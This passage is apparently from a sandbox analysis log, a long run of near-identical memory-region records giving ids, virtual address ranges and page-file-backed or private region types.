1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3652 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3653 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3654 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3655 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3656 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3658 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3659 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3660 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3661 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3662 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3663 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3664 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3665 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3666 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3667 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3668 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3669 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3670 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3671 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3672 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3673 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3674 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3675 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3676 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3680 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3681 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3682 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3683 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3684 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3685 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3686 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3687 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3688 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3689 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3690 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3691 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3692 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3693 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3694 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3695 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3696 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3697 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3698 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3699 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3700 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3701 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3702 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3703 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3704 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3705 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3706 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3707 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3708 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3709 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3710 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3711 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3712 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3713 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3714 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3715 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3716 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3717 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3718 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3719 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3720 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3721 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3722 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3723 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3724 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3725 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3726 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3727 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3728 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3729 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3730 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3731 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3732 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3733 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3734 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3735 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3736 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3737 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3738 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3739 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3740 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3741 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3745 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3746 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3747 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3748 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3749 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3750 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3751 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3752 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3753 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3754 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3755 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3756 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3758 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3759 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3760 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3761 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3762 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3763 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3764 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3765 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3766 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3767 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3768 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3769 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3770 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3773 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3774 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3775 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3776 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3777 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3778 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3779 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3780 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3781 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3782 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3783 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3784 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3785 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3786 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3787 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3790 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3791 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3792 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3793 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3794 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3795 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3796 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3797 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3798 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3799 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3800 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3801 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3802 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3803 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3804 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3805 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3806 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3807 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3808 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3809 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3810 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3811 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3812 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3813 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3814 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3815 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3816 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3817 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3818 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3819 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3820 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3821 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3822 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3823 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3824 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3825 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3826 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3828 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3829 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3830 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3831 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3832 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3833 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3834 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3835 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3836 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3837 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3838 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3839 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3840 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3841 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3842 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3843 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3844 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3845 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3846 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3847 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3848 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3849 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3850 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3851 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 3852 start_va = 0x540000 end_va = 0x54ffff 